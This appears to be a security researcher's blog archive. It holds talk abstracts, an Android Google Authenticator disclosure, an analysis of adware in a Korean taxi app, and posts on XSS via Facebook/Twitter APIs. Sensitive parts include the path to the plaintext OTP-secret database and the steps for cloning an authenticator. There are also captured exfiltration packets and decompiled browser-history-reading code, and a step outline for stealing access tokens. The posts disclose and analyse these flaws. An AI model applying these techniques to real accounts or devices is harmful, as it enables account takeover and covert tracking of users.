[HITB GSEC] Understanding Your Opponent: Attack Profiling

This talk will be based on real world cases in Asia and Korea. We will talk about real approaches for incident response in CERTs and also present the common points and connections between different malware incidents in Asia.

Through various incident response and malware analysis, we have found attackers were using similar malware and attack methods for several incidents. The analysis for common points and relations of attacks can help us to better understand the purpose and tactics of attackers for more effective response. Attack Profiling is a valuable method for figuring out the motives of an attacker, sharing threat intelligence for incidents and preparing response methods for expected future incidents.

We have performed analysis against incidents targeting government agencies, media outlets, broadcasting services, critical infrastructure and the financial sector and in this presentation, we will introduce the approach and methods used for attack profiling.

Outline:

1. Recent Cases

2. Attack Profiling Methods and Factors for Analysis
– Approaches for Profiling
– Tactics, Code and IOC

3. Attack Profiling in Real World Incident Cases
– Case 1 : (Malware targeted to Financial Industry in Asia)
– Case 2 : (APT Incident Case 1)
– Case 3 : (APT Incident Case 2)

4. Conclusion

We hope through this session, attendees will better understand how to analyze an attack and how to figure out it’s possible relations to other incidents.

Conference

 D1 – Understanding Your Opponent Attack Profiling

Mobile Banking integrate with Apple Touch ID

Large scale banks like Bank of America, Chase made a connection with Apple Pay. But, banks in several countries were not worked with Apple Pay directly; they integrated with Apple Touch ID, St George Bank(Australia), Tangerine(Canada), Turkiye Bankasi(Turkey).

They only added the function, authenticated by fingerprint via Touch ID. So, customers can login into mobile banking with their fingerprint instead of the traditional identification, password and PIN.

Banks can develop the fingerprint authentication using Apple’s API. And the biometric data is stored into the customer’s device.

         

Video : https://www.youtube.com/watch?v=VzLtxpSEAj4

Security Expert Hack to Drone

My friend Dongcheol Hong(www.facebook.com/dongcheol.hong) made a presentation about Drone Hacking at Code Blue Conference in Japan. He showed the interaction hijacking between Drone and control app, also he explained about how drone could be infected with malware.

Link : http://www.cbronline.com/news/security/hackers-to-target-firms-via-drone-infection-4483778

Make a secure mobile payment – HITCON 2014

I made a presentation at HITCON 2014 in Taiwan, the title is “Make a secure mobile payment”.

File : E2_06_Yongjun Park – Make a secure mobile payment

[Agenda]

Recently, many kinds of mobile payment have launched, and it has got a large share of payment transactions in the world. As we know that, a breach of payment is highly dangerous because it could be exploited to steal real money, directly.

I have found diverse flows and vulnerabilities during security testing. Some of them could be used to acquire payment data and to change transactions. I will talk about threats of mobile payment and cases of vulnerability. Also, I am going to share how to test the security of mobile payment.

[Google Authenticator] Account and Key plaintexts stored in a file

[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)

I found out a security issue at the Google authenticator in May, 2012. I sent a paper about the details of issue to Google security team, but, I didn’t get a response from them. The authenticator was applied upgrade last year, however, I have no idea whether or not the issue was changed. Anyway I post it before dumping it a behind of memory.

Google provides the 2-step verification to make their service more secure. A user can install and use the Google’s OTP(One Time Passwords) app on their Smartphone. But, I have analyzed a authenticator on Android, I figure out a security issue that can be used to make a clone authenticator on another Smartphone.

When a user try to register their Smartphone to use the authenticator, a user have to input their account and, key or scan QR code. And then, the authenticator it starting to create one time password. Now a user can authenticate with Google services through a one time credential.

< Add account >

The authenticator provides two selections to be initialized, ‘Scan bar-code’ and ‘Manually add account’. But if you choose anything, account and key are stored in a file. But the problem is that the user account and key are stored in a file as a plaintext

Stored file is sqlite and the file path is

“/data/data/com.google.android.apps.authenticatior2/database/database”

As you can see the below, the email  field is a user account and the secret field is a key for the authenticator. The secret are looks encrypted, but it’s not a matter to make a clone authenticator.

< An example of stored key and secret >

If the file is copied or secrets and keys are duplicated into the another Smartphone’ authenticator, now we have a clone authenticator. The duplicated authenticators are creating a same one time password at the same time, and it can be used to authenticate the Google’s services.

I checked that the authenticator is verifying the device with phone number, Serial or IMEI, but device verification were not applied and it’s not affected the authenticator.

 

< The clone OTP >

The suggestions for this issue

1. Encrypt account and key files
2. Verify a device when the app executed to check it is a valid device or not or include a device serial into the one time password creation process
3. Using more secure space like SIM, Turst Zone to prevent from the malicious access(In Korea, OTP apps for banks and financial sector are stored and executed in the SIM card)

User Activities Leakage with Free App

The android free app is transferring the device conditions and user activities without the user agreement. An adware included the free app is collecting the internet access data and launched app history on the installed device.

Free app: National Call Taxi – 전국 콜텍시(Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The name of launched app and accessed URL list were sent to the outside server when user execute an app or connect to web with a mobile browser during the ‘National Call Taxi’ app launched or  in background. The malicious code is NOT a part of main source of the app, but it was included the adware module of app for profit.

The malicious data includes internet access URL, access time, applied rooting, WiFi status and device serial number (Not a real UUID, randomly generated).

[Sending Packet(URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 208User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr Connection: Keep-Alive Accept-Encoding: gzip ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=web&ldt=20130418162111&nsf=23554400003&wifi=wifi&rooting=0&data=0 http://www.google.co.kr/029.50820130418162111

[Sending Packet(App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1Content-Type: application/x-www-form-urlencodedContent-Length: 233User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)Host: ma01.mediachannel.co.kr Connection: Keep-Alive Accept-Encoding: gzip ver=2.0.1&collectapp=kr.baccharis.callTaxi&serial=54df1ff7-f783-43d7-911d-1cfd74c1fb2f&ltype=app&ldt=20130418162138&nsf=811915200069&wifi=wifi&rooting=0&data= 0201304181620222013041816213876.0com.android.browserandroid

[Sending Information]

–  Malicious App Version and Name
–  Serial Number(Generated random UUID)
–  Type : app(app execution) or web(web access)
–  Wifi and Rooting status
–  Executed App Name or Access URL

I have decompiled the malicious app and reviews the code of malicious functions.

[UUID Generation]

private String w(){

String str = "";

try

{

str = <b>UUID.randomUUID().toString();</b>

new StringBuilder("CreateSerial : ").append(str).toString();

b(str);

label33: return str;

}

catch (Exception localException)

{

break label33;

}

}

[Browser History Access]

unregisterReceiver(this.s);stopSelf();Intent localIntent = new Intent(this, revRankey.class);

localIntent.putExtra("appwebCollect", 4500);

localIntent.setAction("Action.Restart.MediaChannelService");

PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);

g.g.set(2, 10000L, localPendingIntent);

if (localObject4 == null)

continue;

((Cursor)localObject4).close();

return;

<b>Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");</b>

localObject4 = localCursor1;

break;

((Cursor)localObject4).moveToLast();

((Cursor)localObject4).getCount();

localObject5 = "";

if (!((Cursor)localObject4).isBeforeFirst())

continue;

if (localObject1 == null)

continue;

boolean bool1 = localObject1.contentEquals("0");

if (!bool1)

break label509;

if (localObject4 == null)

Some adware are collecting the user behavior and internet access history data. And the advertising companies extract the worth from the data for their marketing. I guess that the web accessing and app launching data of the malicious app would be used for the similar purpose. But, WiFi status and Rooting conditions are able to use breaking into the device. I already posted the issue with Facebook, warning the another app include the adware could be exposed same security issue
.

South Korea Cyberterror on March 20th – News –

***Updated on march 26th***

[English]

South Korean Attack & Malware Analysis
http://www.infosecisland.com/blogview/23032-South-Korean-Attack-amp-Malware-Analysis.html

South Korean Banks, Media Companies Targeted by Destructive Malware
http://blogs.mcafee.com/mcafee-labs/south-korean-banks-media-companies-targeted-by-destructive-malware

[Korean]

Wowhacker Report

http://wowhacker.org/files/0320_cyberterror_stolenbyte.pdf

NProtect Report
http://erteam.nprotect.com/408

Ahnlab
http://asec.ahnlab.com/926

Each report are continuingly updating, Korean reports have more detail and correct information. I’ll keep updating.

XSS using Facebook, Twitter open API – Addition

In the previous post, XSS using Facebook, Twitter open API, I mentioned that open API could be used to XSS on consumer’s web page. But, some people misunderstood it and they asked about it, It is not working on Facebook page, it is working on consumer’s page developed by open API. I posted it to show the bad case of open API and to demonstrate that it can be a threat of service providers and users.

And API were not completely opened to XSS, Service provider’s have adopted the permission model, that separate out each feature based on each permission. A user need to confirm the permission permit at the first access via each feature like login, feed, like and others. (http://developers.facebook.com/docs/reference/login/#permissions)

API Permission of Yahoo App

But, if a user already permitted the permission of features that the attacker want to use, there is no permission message. So, these status and other information are need to make a payload. It is similar with the development app using API.

I give an example Facebook APIs, but other service providers adopted similar API structures and features. And the effect of XSS is depend on the consumer’s circumstance, but it can be a threat on some environments. The key factor is that many consumer’s pages are not secure to protect from XSS. They should audit their pages and hide the app secret and only grant the minimum permissions.

XSS using Facebook, Twitter open API

Many SNS, App and online service providers are opening APIs that can handle a features of services and be used to expand the business area. Service providers have opened huge documents and samples on various platforms like web, app and mobile for a developer.

For example, Facebook provide APIs that can be applied on Android, iOS and web, and implemented with PHP, Java Script and other language. A developer can use it to connect the login feature with Facebook, feed the messages or apply payment on their app.

But, some APIs can be maliciously used on the developer(consumer)’s services. If a developer implement the feature using open API, it means that the API provider’s data and functions might be controlled via developer’s actions. So, API providers only permit their resources for registered developers to prevent the threat. But, the registered is not exactly mean the secure. If a developer do not have the intention to attack API and provider’s data, but developer’s app could have a vulnerability that can manipulate it. Twitter, Facebook, Google and other large-scale service providers are commonly performing security review and testing for the services. However, the API developer like a web service provider, app developer and individual are not have enough resource and considerations for the secure service.

Some APIs can handle user’s credential, profile and other information. For example, Facebook login API support the developer’s application to use Facebook authorization. The developer’s application can login via the Facebook credential and use the user information of Facebook for their services

If the developer’s application has a XSS vulnerability, the attacker can inject the well-made payload and he is stealing the credential like access token via the boards or pages. The attack can manipulate Facebook features using victim’s access token, such as collecting user’s profile and spreading malicious feeds.

This is my demonstration XSS using Facebook open API. XSS on the consumer’s web page by Login API can be used to steal access_token. XSS payload steal user’s access_token on the consumer’s web page and the attacker is able to feed a message via the stolen access_token.

1. The attacker inject XSS payload into the post of the consumer’s website.

2. Victim read the post with XSS payload and the payload will send the user’s access_token to the attacker’s server

3. The attacker feed the message to the user’s Facebook

I never mention about the detail of payload and tool, but if you see the API documents and if you have experienced API development, you can understand it easily.

[Python] Example for Sending POST request via HTTPS

When you develop a tool to interact with HTTPS server, sometimes you need a code that can sending a POST request via HTTPS. I was searching the best example for my tool, but I couldn’t. So, I made the code referenced POST via HTTP and it works well. I post the sample code.

>>> import httplib, urllib
>>> params = urllib.urlencode({'@number': 12524, '@type': 'issue', '@action': 'show'})
>>> headers = {"Content-type": "application/x-www-form-urlencoded",
              "Accept": "text/plain",
              "Other": "Header"}
>>> conn = httplib.HTTPSConnection("bugs.python.org") # HTTPSConnection instead of HTTPConnection
>>> conn.request("POST", "", params, headers)
>>> response = conn.getresponse()
>>> print response.status, response.reason
>>> data = response.read()
>>> print data
>>> conn.close()